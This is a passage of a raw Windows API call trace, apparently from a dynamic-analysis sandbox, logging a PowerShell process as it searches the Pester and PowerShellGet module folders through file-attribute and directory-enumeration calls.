nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e3392cd718*, lpNumberOfBytesRead=0xb156f8dc28*=0x5e5, lpOverlapped=0x0) returned 1 [0140.488] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e3392ccc3d, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e3392ccc3d*, lpNumberOfBytesRead=0xb156f8dc28*=0x0, lpOverlapped=0x0) returned 1 [0140.488] ReadFile (in: hFile=0x6fc, lpBuffer=0x1e3392cd718, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc28, lpOverlapped=0x0 | out: lpBuffer=0x1e3392cd718*, lpNumberOfBytesRead=0xb156f8dc28*=0x0, lpOverlapped=0x0) returned 1 [0140.488] CloseHandle (hObject=0x6fc) returned 1 [0140.494] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0140.494] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0140.494] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0140.494] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0140.494] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0140.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0xb156f8d810, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0140.495] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0xb156f8da40 | out: lpFindFileData=0xb156f8da40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a24e0 [0140.495] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.495] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0140.496] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.496] FindClose (in: hFindFile=0x1e3371a24e0 | out: hFindFile=0x1e3371a24e0) returned 1 [0140.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.496] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0xb156f8d810, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0140.496] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0xb156f8da40 | out: lpFindFileData=0xb156f8da40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a24e0 [0140.497] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.497] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0140.497] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0140.497] FindClose (in: hFindFile=0x1e3371a24e0 | out: hFindFile=0x1e3371a24e0) returned 1 [0140.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dba0) returned 1 [0140.498] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8d680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0140.498] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\*"), lpFindFileData=0xb156f8d8b0 | out: lpFindFileData=0xb156f8d8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.498] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.499] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0140.499] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0140.499] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0140.499] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0140.499] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0140.500] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0140.500] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dad0) returned 1 [0140.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8da90) returned 1 [0140.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dba0) returned 1 [0140.500] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8d680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0140.500] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\*"), lpFindFileData=0xb156f8d8b0 | out: lpFindFileData=0xb156f8d8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.501] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.501] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0140.501] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0140.501] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0140.502] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0140.502] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0140.502] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d870 | out: lpFindFileData=0xb156f8d870*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.502] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dad0) returned 1 [0140.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8da90) returned 1 [0140.503] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8d760, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0140.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dbb0) returned 1 [0140.503] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8dc90 | out: lpFileInformation=0xb156f8dc90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0140.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8db70) returned 1 [0140.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dc00) returned 1 [0140.503] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8d6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0140.503] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\*"), lpFindFileData=0xb156f8d910 | out: lpFindFileData=0xb156f8d910*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.504] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.504] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0140.504] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0140.504] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0140.504] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0140.505] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0140.505] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8d8d0 | out: lpFindFileData=0xb156f8d8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0140.505] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8db30) returned 1 [0140.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8daf0) returned 1 [0140.506] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0140.506] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0140.506] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0140.506] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0140.506] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.dll")) returned 